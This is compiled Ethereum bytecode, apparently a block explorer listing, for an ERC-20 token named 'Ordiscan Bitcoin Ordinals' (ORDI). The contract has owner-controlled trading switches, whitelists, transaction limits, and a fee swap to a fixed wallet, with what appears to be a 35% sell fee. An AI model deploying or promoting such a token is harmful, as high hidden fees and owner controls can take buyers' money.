60c0604052600b805461ffff19166101001790556010805460ff1916905534801562000029575f80fd5b506040518060400160405280601981526020017f4f7264697363616e20426974636f696e204f7264696e616c7300000000000000815250604051806040016040528060048152602001634f52444960e01b81525081600390816200008e919062000675565b5060046200009d828262000675565b505050620000ba620000b46200038f60201b60201c565b62000393565b6a084595161401484a00000060088190556009556969e10de76676d0800000600a55737a250d5630b4cf539739df2c5dacb4c659f2488d60808190526b033b2e3c9fd0803ce800000062000110826001620003e4565b816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200014d573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000173919062000741565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001bf573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001e5919062000741565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801562000230573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000256919062000741565b6001600160a01b031660a081905262000271906001620003e4565b60a0516200028190600162000443565b620002a0620002986005546001600160a01b031690565b6001620003e4565b620002c17378283adeac93c64aefe45a0c7fb86750db24caff6001620003e4565b620002e273c5398c0cf0439a411d15a5b275911d42713d90d56001620003e4565b620002f161dead6001620003e4565b620002fe306001620003e4565b6200031d620003156005546001600160a01b031690565b600162000496565b6200033e7378283adeac93c64aefe45a0c7fb86750db24caff600162000496565b6200035f73c5398c0cf0439a411d15a5b275911d42713d90d5600162000496565b6200036e61dead600162000496565b6200037b30600162000496565b620003873382620004ee565b505062000796565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0382165f818152600e6020908152604091829020805460ff191685151590811790915591519182527fc5e00cfc9494c002f5a5ecb735339bf61c88d0e9340bbe76d10bb5f0e48e6f8591015b60405180910390a25050565b6001600160a01b0382165f818152600f6020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0382165f818152600d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910162000437565b6001600160a01b038216620005495760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025f8282546200055c919062000770565b90915550506001600160a01b0382165f90815260208190526040812080548392906200058a90849062000770565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200060157607f821691505b6020821081036200062057634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620005d357805f5260205f20601f840160051c810160208510156200064d5750805b601f840160051c820191505b818110156200066e575f815560010162000659565b5050505050565b81516001600160401b03811115620006915762000691620005d8565b620006a981620006a28454620005ec565b8462000626565b602080601f831160018114620006df575f8415620006c75750858301515b5f19600386901b1c1916600185901b17855562000739565b5f85815260208120601f198616915b828110156200070f57888601518255948401946001909101908401620006ee565b50858210156200072d57878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b5f6020828403121562000752575f80fd5b81516001600160a01b038116811462000769575f80fd5b9392505050565b808201808211156200079057634e487b7160e01b5f52601160045260245ffd5b92915050565b60805160a0516119f8620007cd5f395f61034d01525f8181610280015281816115860152818161163d015261167901526119f85ff3fe6080604052600436106101e9575f3560e01c80638da5cb5b11610108578063b62496f51161009d578063cfa715931161006d578063cfa715931461055a578063dd62ed3e1461056e578063e2f45605146105b2578063f2fde38b146105c7578063f8b45b05146105e6575f80fd5b8063b62496f5146104e5578063bbc0c74214610513578063c876d0b91461052c578063c8c8ebe414610545575f80fd5b80639fccce32116100d85780639fccce3214610492578063a0d82dc51461047e578063a457c2d7146104a7578063a9059cbb146104c6575f80fd5b80638da5cb5b146104265780638ea5220f1461044357806395d89b411461046a5780639c3b4fdc1461047e575f80fd5b8063395093511161017e578063715018a61161014e578063715018a6146103c1578063751039fc146103d757806375f0a874146103eb5780638a8c523c14610412575f80fd5b8063395093511461031d57806349bd5a5e1461033c5780634a62bb651461036f57806370a082311461038d575f80fd5b806318160ddd116101b957806318160ddd146102ba57806323b872dd146102ce57806327c8f835146102ed578063313ce56714610302575f80fd5b806306fdde03146101f4578063095ea7b31461021e5780630e14ebdc1461024d5780631694505e1461026f575f80fd5b366101f057005b5f80fd5b3480156101ff575f80fd5b506102086105fb565b60405161021591906116df565b60405180910390f35b348015610229575f80fd5b5061023d61023836600461173f565b61068b565b6040519015158152602001610215565b348015610258575f80fd5b50610261602381565b604051908152602001610215565b34801561027a575f80fd5b506102a27f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610215565b3480156102c5575f80fd5b50600254610261565b3480156102d9575f80fd5b5061023d6102e8366004611769565b6106a1565b3480156102f8575f80fd5b506102a261dead81565b34801561030d575f80fd5b5060405160128152602001610215565b348015610328575f80fd5b5061023d61033736600461173f565b61074e565b348015610347575f80fd5b506102a27f000000000000000000000000000000000000000000000000000000000000000081565b34801561037a575f80fd5b50600b5461023d90610100900460ff1681565b348015610398575f80fd5b506102616103a73660046117a7565b6001600160a01b03165f9081526020819052604090205490565b3480156103cc575f80fd5b506103d5610789565b005b3480156103e2575f80fd5b5061023d6107be565b3480156103f6575f80fd5b506102a273c5398c0cf0439a411d15a5b275911d42713d90d581565b34801561041d575f80fd5b506103d56107fb565b348015610431575f80fd5b506005546001600160a01b03166102a2565b34801561044e575f80fd5b506102a27378283adeac93c64aefe45a0c7fb86750db24caff81565b348015610475575f80fd5b50610208610838565b348015610489575f80fd5b50610261600481565b34801561049d575f80fd5b50610261600c5481565b3480156104b2575f80fd5b5061023d6104c136600461173f565b610847565b3480156104d1575f80fd5b5061023d6104e036600461173f565b6108df565b3480156104f0575f80fd5b5061023d6104ff3660046117a7565b600f6020525f908152604090205460ff1681565b34801561051e575f80fd5b50600b5461023d9060ff1681565b348015610537575f80fd5b5060105461023d9060ff1681565b348015610550575f80fd5b5061026160085481565b348015610565575f80fd5b50610261600a81565b348015610579575f80fd5b506102616105883660046117c9565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b3480156105bd575f80fd5b50610261600a5481565b3480156105d2575f80fd5b506103d56105e13660046117a7565b6108eb565b3480156105f1575f80fd5b5061026160095481565b60606003805461060a90611800565b80601f016020809104026020016040519081016040528092919081815260200182805461063690611800565b80156106815780601f1061065857610100808354040283529160200191610681565b820191905f5260205f20905b81548152906001019060200180831161066457829003601f168201915b5050505050905090565b5f610697338484610986565b5060015b92915050565b5f6106ad848484610aa9565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156107365760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6107438533858403610986565b506001949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909161069791859061078490869061184c565b610986565b6005546001600160a01b031633146107b35760405162461bcd60e51b815260040161072d9061185f565b6107bc5f6112c2565b565b6005545f906001600160a01b031633146107ea5760405162461bcd60e51b815260040161072d9061185f565b50600b805461ff0019169055600190565b6005546001600160a01b031633146108255760405162461bcd60e51b815260040161072d9061185f565b600b805460ff1916600117905543600655565b60606004805461060a90611800565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156108c85760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161072d565b6108d53385858403610986565b5060019392505050565b5f610697338484610aa9565b6005546001600160a01b031633146109155760405162461bcd60e51b815260040161072d9061185f565b6001600160a01b03811661097a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161072d565b610983816112c2565b50565b6001600160a01b0383166109e85760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161072d565b6001600160a01b038216610a495760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161072d565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610acf5760405162461bcd60e51b815260040161072d90611894565b6001600160a01b038216610b315760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161072d565b805f03610b4857610b4383835f611313565b505050565b600b54610100900460ff1615610eb7576005546001600160a01b03848116911614801590610b8457506005546001600160a01b03838116911614155b8015610b9b57506001600160a01b03821661dead14155b8015610baf57506001600160a01b03821615155b8015610bbe575060075460ff16155b15610eb757600b5460ff16610c56576001600160a01b0383165f908152600d602052604090205460ff1680610c0a57506001600160a01b0382165f908152600d602052604090205460ff165b610c565760405162461bcd60e51b815260206004820152601760248201527f54726164696e67206973206e6f7420656e61626c65642e000000000000000000604482015260640161072d565b6001600160a01b0383165f908152600f602052604090205460ff168015610c9557506001600160a01b0382165f908152600e602052604090205460ff16155b15610d7957600854811115610d0a5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b606482015260840161072d565b6009546001600160a01b0383165f90815260208190526040902054610d2f908361184c565b1115610d745760405162461bcd60e51b815260206004820152601460248201527326b0bc103bb0b63632ba1032bc31b2b2b232b21760611b604482015260640161072d565b610eb7565b6001600160a01b0382165f908152600f602052604090205460ff168015610db857506001600160a01b0383165f908152600e602052604090205460ff16155b15610e2e57600854811115610d745760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b606482015260840161072d565b6001600160a01b0382165f908152600e602052604090205460ff16610eb7576009546001600160a01b0383165f90815260208190526040902054610e72908361184c565b1115610eb75760405162461bcd60e51b815260206004820152601460248201527326b0bc103bb0b63632ba1032bc31b2b2b232b21760611b604482015260640161072d565b6001600160a01b0383165f908152600d602052604090205460ff1680610ef457506001600160a01b0382165f908152600d602052604090205460ff165b8015610f0957506001600160a01b0382163014155b8015610f1e57506001600160a01b0383163014155b15610f2857426012555b6001600160a01b0383165f908152600d602052604090205460ff168015610f7d5750600d5f610f5f6005546001600160a01b031690565b6001600160a01b0316815260208101919091526040015f205460ff16155b15610f8d57610b43838383611440565b6001600160a01b0383165f908152600d602052604090205460ff16158015610fcd57506001600160a01b0382165f908152600d602052604090205460ff16155b1561104e576001600160a01b0383165f908152600f602052604090205460ff16611028576001600160a01b0383165f908152601160205260409020601254815461101791906118d9565b60028201554260019091015561104e565b6001600160a01b0382165f908152601160205260408120805490910361104c574281555b505b5f600654600861105e919061184c565b431090505f611081306001600160a01b03165f9081526020819052604090205490565b600a5411159050808015611093575081155b80156110a2575060075460ff16155b80156110c657506001600160a01b0385165f908152600f602052604090205460ff16155b80156110ea57506001600160a01b0385165f908152600d602052604090205460ff16155b801561110e57506001600160a01b0384165f908152600d602052604090205460ff16155b15611133576007805460ff19166001179055611128611478565b6007805460ff191690555b6007546001600160a01b0386165f908152600d602052604090205460ff9182161591168061117857506001600160a01b0385165f908152600d602052604090205460ff165b1561118057505f5b5f81156112ae5783611213576001600160a01b0387165f908152600f602052604090205460ff16156111e15760646111b96004876118ec565b6111c39190611903565b905080600c5f8282546111d6919061184c565b909155506112909050565b6001600160a01b0386165f908152600f602052604090205460ff161561120e5760646111b96004876118ec565b611290565b6001600160a01b0387165f908152600f602052604090205460ff16156112405760646111b9600a876118ec565b6001600160a01b0386165f908152600f602052604090205460ff161561129057606461126d6023876118ec565b6112779190611903565b905080600c5f82825461128a919061184c565b90915550505b80156112a1576112a1873083611313565b6112ab81866118d9565b94505b6112b9878787611313565b50505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0383166113395760405162461bcd60e51b815260040161072d90611894565b6001600160a01b0383165f90815260208190526040902054818110156113b05760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161072d565b6001600160a01b038085165f908152602081905260408082208585039055918516815290812080548492906113e690849061184c565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161143291815260200190565b60405180910390a350505050565b6001600160a01b038084165f9081526020819052604080822080548581039091559285168252812080548492906113e690849061184c565b305f90815260208190526040902054600c54811580611495575080155b1561149e575050565b600a546114ac9060106118ec565b8211156114c457600a546114c19060106118ec565b91505b6114cd82611531565b5f600c8190556040517378283adeac93c64aefe45a0c7fb86750db24caff9047908381818185875af1925050503d805f8114611524576040519150601f19603f3d011682016040523d82523d5f602084013e611529565b606091505b505050505050565b6040805160028082526060820183525f9260208301908036833701905050905030815f8151811061156457611564611922565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156115e0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116049190611936565b8160018151811061161757611617611922565b60200260200101906001600160a01b031690816001600160a01b031681525050611662307f000000000000000000000000000000000000000000000000000000000000000084610986565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac947906116b69085905f90869030904290600401611951565b5f604051808303815f87803b1580156116cd575f80fd5b505af1158015611529573d5f803e3d5ffd5b5f602080835283518060208501525f5b8181101561170b578581018301518582016040015282016116ef565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610983575f80fd5b5f8060408385031215611750575f80fd5b823561175b8161172b565b946020939093013593505050565b5f805f6060848603121561177b575f80fd5b83356117868161172b565b925060208401356117968161172b565b929592945050506040919091013590565b5f602082840312156117b7575f80fd5b81356117c28161172b565b9392505050565b5f80604083850312156117da575f80fd5b82356117e58161172b565b915060208301356117f58161172b565b809150509250929050565b600181811c9082168061181457607f821691505b60208210810361183257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561069b5761069b611838565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b8181038181111561069b5761069b611838565b808202811582820484141761069b5761069b611838565b5f8261191d57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611946575f80fd5b81516117c28161172b565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156119a15784516001600160a01b03168352938301939183019160010161197c565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220df8b71479f485e0cabd3b7fcdef757173baec65587f106a74ede299665fcf40c64736f6c63430008160033
Deployed Bytecode
0x6080604052600436106101e9575f3560e01c80638da5cb5b11610108578063b62496f51161009d578063cfa715931161006d578063cfa715931461055a578063dd62ed3e1461056e578063e2f45605146105b2578063f2fde38b146105c7578063f8b45b05146105e6575f80fd5b8063b62496f5146104e5578063bbc0c74214610513578063c876d0b91461052c578063c8c8ebe414610545575f80fd5b80639fccce32116100d85780639fccce3214610492578063a0d82dc51461047e578063a457c2d7146104a7578063a9059cbb146104c6575f80fd5b80638da5cb5b146104265780638ea5220f1461044357806395d89b411461046a5780639c3b4fdc1461047e575f80fd5b8063395093511161017e578063715018a61161014e578063715018a6146103c1578063751039fc146103d757806375f0a874146103eb5780638a8c523c14610412575f80fd5b8063395093511461031d57806349bd5a5e1461033c5780634a62bb651461036f57806370a082311461038d575f80fd5b806318160ddd116101b957806318160ddd146102ba57806323b872dd146102ce57806327c8f835146102ed578063313ce56714610302575f80fd5b806306fdde03146101f4578063095ea7b31461021e5780630e14ebdc1461024d5780631694505e1461026f575f80fd5b366101f057005b5f80fd5b3480156101ff575f80fd5b506102086105fb565b60405161021591906116df565b60405180910390f35b348015610229575f80fd5b5061023d61023836600461173f565b61068b565b6040519015158152602001610215565b348015610258575f80fd5b50610261602381565b604051908152602001610215565b34801561027a575f80fd5b506102a27f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b039091168152602001610215565b3480156102c5575f80fd5b50600254610261565b3480156102d9575f80fd5b5061023d6102e8366004611769565b6106a1565b3480156102f8575f80fd5b506102a261dead81565b34801561030d575f80fd5b5060405160128152602001610215565b348015610328575f80fd5b5061023d61033736600461173f565b61074e565b348015610347575f80fd5b506102a27f000000000000000000000000b75f0d89b6f704870deacf4c37026db812d2db2e81565b34801561037a575f80fd5b50600b5461023d90610100900460ff1681565b348015610398575f80fd5b506102616103a73660046117a7565b6001600160a01b03165f9081526020819052604090205490565b3480156103cc575f80fd5b506103d5610789565b005b3480156103e2575f80fd5b5061023d6107be565b3480156103f6575f80fd5b506102a273c5398c0cf0439a411d15a5b275911d42713d90d581565b34801561041d575f80fd5b506103d56107fb565b348015610431575f80fd5b506005546001600160a01b03166102a2565b34801561044e575f80fd5b506102a27378283adeac93c64aefe45a0c7fb86750db24caff81565b348015610475575f80fd5b50610208610838565b348015610489575f80fd5b50610261600481565b34801561049d575f80fd5b50610261600c5481565b3480156104b2575f80fd5b5061023d6104c136600461173f565b610847565b3480156104d1575f80fd5b5061023d6104e036600461173f565b6108df565b3480156104f0575f80fd5b5061023d6104ff3660046117a7565b600f6020525f908152604090205460ff1681565b34801561051e575f80fd5b50600b5461023d9060ff1681565b348015610537575f80fd5b5060105461023d9060ff1681565b348015610550575f80fd5b5061026160085481565b348015610565575f80fd5b50610261600a81565b348015610579575f80fd5b506102616105883660046117c9565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b3480156105bd575f80fd5b50610261600a5481565b3480156105d2575f80fd5b506103d56105e13660046117a7565b6108eb565b3480156105f1575f80fd5b5061026160095481565b60606003805461060a90611800565b80601f016020809104026020016040519081016040528092919081815260200182805461063690611800565b80156106815780601f1061065857610100808354040283529160200191610681565b820191905f5260205f20905b81548152906001019060200180831161066457829003601f168201915b5050505050905090565b5f610697338484610986565b5060015b92915050565b5f6106ad848484610aa9565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156107365760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6107438533858403610986565b506001949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909161069791859061078490869061184c565b610986565b6005546001600160a01b031633146107b35760405162461bcd60e51b815260040161072d9061185f565b6107bc5f6112c2565b565b6005545f906001600160a01b031633146107ea5760405162461bcd60e51b815260040161072d9061185f565b50600b805461ff0019169055600190565b6005546001600160a01b031633146108255760405162461bcd60e51b815260040161072d9061185f565b600b805460ff1916600117905543600655565b60606004805461060a90611800565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156108c85760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161072d565b6108d53385858403610986565b5060019392505050565b5f610697338484610aa9565b6005546001600160a01b031633146109155760405162461bcd60e51b815260040161072d9061185f565b6001600160a01b03811661097a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161072d565b610983816112c2565b50565b6001600160a01b0383166109e85760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161072d565b6001600160a01b038216610a495760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161072d565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610acf5760405162461bcd60e51b815260040161072d90611894565b6001600160a01b038216610b315760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161072d565b805f03610b4857610b4383835f611313565b505050565b600b54610100900460ff1615610eb7576005546001600160a01b03848116911614801590610b8457506005546001600160a01b03838116911614155b8015610b9b57506001600160a01b03821661dead14155b8015610baf57506001600160a01b03821615155b8015610bbe575060075460ff16155b15610eb757600b5460ff16610c56576001600160a01b0383165f908152600d602052604090205460ff1680610c0a57506001600160a01b0382165f908152600d602052604090205460ff165b610c565760405162461bcd60e51b815260206004820152601760248201527f54726164696e67206973206e6f7420656e61626c65642e000000000000000000604482015260640161072d565b6001600160a01b0383165f908152600f602052604090205460ff168015610c9557506001600160a01b0382165f908152600e602052604090205460ff16155b15610d7957600854811115610d0a5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b606482015260840161072d565b6009546001600160a01b0383165f90815260208190526040902054610d2f908361184c565b1115610d745760405162461bcd60e51b815260206004820152601460248201527326b0bc103bb0b63632ba1032bc31b2b2b232b21760611b604482015260640161072d565b610eb7565b6001600160a01b0382165f908152600f602052604090205460ff168015610db857506001600160a01b0383165f908152600e602052604090205460ff16155b15610e2e57600854811115610d745760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b606482015260840161072d565b6001600160a01b0382165f908152600e602052604090205460ff16610eb7576009546001600160a01b0383165f90815260208190526040902054610e72908361184c565b1115610eb75760405162461bcd60e51b815260206004820152601460248201527326b0bc103bb0b63632ba1032bc31b2b2b232b21760611b604482015260640161072d565b6001600160a01b0383165f908152600d602052604090205460ff1680610ef457506001600160a01b0382165f908152600d602052604090205460ff165b8015610f0957506001600160a01b0382163014155b8015610f1e57506001600160a01b0383163014155b15610f2857426012555b6001600160a01b0383165f908152600d602052604090205460ff168015610f7d5750600d5f610f5f6005546001600160a01b031690565b6001600160a01b0316815260208101919091526040015f205460ff16155b15610f8d57610b43838383611440565b6001600160a01b0383165f908152600d602052604090205460ff16158015610fcd57506001600160a01b0382165f908152600d602052604090205460ff16155b1561104e576001600160a01b0383165f908152600f602052604090205460ff16611028576001600160a01b0383165f908152601160205260409020601254815461101791906118d9565b60028201554260019091015561104e565b6001600160a01b0382165f908152601160205260408120805490910361104c574281555b505b5f600654600861105e919061184c565b431090505f611081306001600160a01b03165f9081526020819052604090205490565b600a5411159050808015611093575081155b80156110a2575060075460ff16155b80156110c657506001600160a01b0385165f908152600f602052604090205460ff16155b80156110ea57506001600160a01b0385165f908152600d602052604090205460ff16155b801561110e57506001600160a01b0384165f908152600d602052604090205460ff16155b15611133576007805460ff19166001179055611128611478565b6007805460ff191690555b6007546001600160a01b0386165f908152600d602052604090205460ff9182161591168061117857506001600160a01b0385165f908152600d602052604090205460ff165b1561118057505f5b5f81156112ae5783611213576001600160a01b0387165f908152600f602052604090205460ff16156111e15760646111b96004876118ec565b6111c39190611903565b905080600c5f8282546111d6919061184c565b909155506112909050565b6001600160a01b0386165f908152600f602052604090205460ff161561120e5760646111b96004876118ec565b611290565b6001600160a01b0387165f908152600f602052604090205460ff16156112405760646111b9600a876118ec565b6001600160a01b0386165f908152600f602052604090205460ff161561129057606461126d6023876118ec565b6112779190611903565b905080600c5f82825461128a919061184c565b90915550505b80156112a1576112a1873083611313565b6112ab81866118d9565b94505b6112b9878787611313565b50505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0383166113395760405162461bcd60e51b815260040161072d90611894565b6001600160a01b0383165f90815260208190526040902054818110156113b05760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161072d565b6001600160a01b038085165f908152602081905260408082208585039055918516815290812080548492906113e690849061184c565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161143291815260200190565b60405180910390a350505050565b6001600160a01b038084165f9081526020819052604080822080548581039091559285168252812080548492906113e690849061184c565b305f90815260208190526040902054600c54811580611495575080155b1561149e575050565b600a546114ac9060106118ec565b8211156114c457600a546114c19060106118ec565b91505b6114cd82611531565b5f600c8190556040517378283adeac93c64aefe45a0c7fb86750db24caff9047908381818185875af1925050503d805f8114611524576040519150601f19603f3d011682016040523d82523d5f602084013e611529565b606091505b505050505050565b6040805160028082526060820183525f9260208301908036833701905050905030815f8151811061156457611564611922565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156115e0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116049190611936565b8160018151811061161757611617611922565b60200260200101906001600160a01b031690816001600160a01b031681525050611662307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610986565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac947906116b69085905f90869030904290600401611951565b5f604051808303815f87803b1580156116cd575f80fd5b505af1158015611529573d5f803e3d5ffd5b5f602080835283518060208501525f5b8181101561170b578581018301518582016040015282016116ef565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610983575f80fd5b5f8060408385031215611750575f80fd5b823561175b8161172b565b946020939093013593505050565b5f805f6060848603121561177b575f80fd5b83356117868161172b565b925060208401356117968161172b565b929592945050506040919091013590565b5f602082840312156117b7575f80fd5b81356117c28161172b565b9392505050565b5f80604083850312156117da575f80fd5b82356117e58161172b565b915060208301356117f58161172b565b809150509250929050565b600181811c9082168061181457607f821691505b60208210810361183257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561069b5761069b611838565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b8181038181111561069b5761069b611838565b808202811582820484141761069b5761069b611838565b5f8261191d57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611946575f80fd5b81516117c28161172b565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156119a15784516001600160a01b03168352938301939183019160010161197c565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220df8b71479f485e0cabd3b7fcdef757173baec65587f106a74ede299665fcf40c64736f6c63430008160033
Deployed Bytecode Sourcemap
21884:10465:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8693:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10860:169;;;;;;;;;;-1:-1:-1;10860:169:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;10860:169:0;1023:187:1;22168:43:0;;;;;;;;;;;;22209:2;22168:43;;;;;1361:25:1;;;1349:2;1334:18;22168:43:0;1215:177:1;21927:51:0;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;1587:32:1;;;1569:51;;1557:2;1542:18;21927:51:0;1397:229:1;9813:108:0;;;;;;;;;;-1:-1:-1;9901:12:0;;9813:108;;11511:492;;;;;;;;;;-1:-1:-1;11511:492:0;;;;;:::i;:::-;;:::i;22032:53::-;;;;;;;;;;;;22078:6;22032:53;;9655:93;;;;;;;;;;-1:-1:-1;9655:93:0;;9738:2;2442:36:1;;2430:2;2415:18;9655:93:0;2300:184:1;12412:215:0;;;;;;;;;;-1:-1:-1;12412:215:0;;;;;:::i;:::-;;:::i;21985:38::-;;;;;;;;;;;;;;;22758:33;;;;;;;;;;-1:-1:-1;22758:33:0;;;;;;;;;;;9984:127;;;;;;;;;;-1:-1:-1;9984:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;10085:18:0;10058:7;10085:18;;;;;;;;;;;;9984:127;2605:103;;;;;;;;;;;;;:::i;:::-;;25627:121;;;;;;;;;;;;;:::i;22429:101::-;;;;;;;;;;;;22487:42;22429:101;;25477:120;;;;;;;;;;;;;:::i;1954:87::-;;;;;;;;;;-1:-1:-1;2027:6:0;;-1:-1:-1;;;;;2027:6:0;1954:87;;22327:95;;;;;;;;;;;;22379:42;22327:95;;8912:104;;;;;;;;;;;;;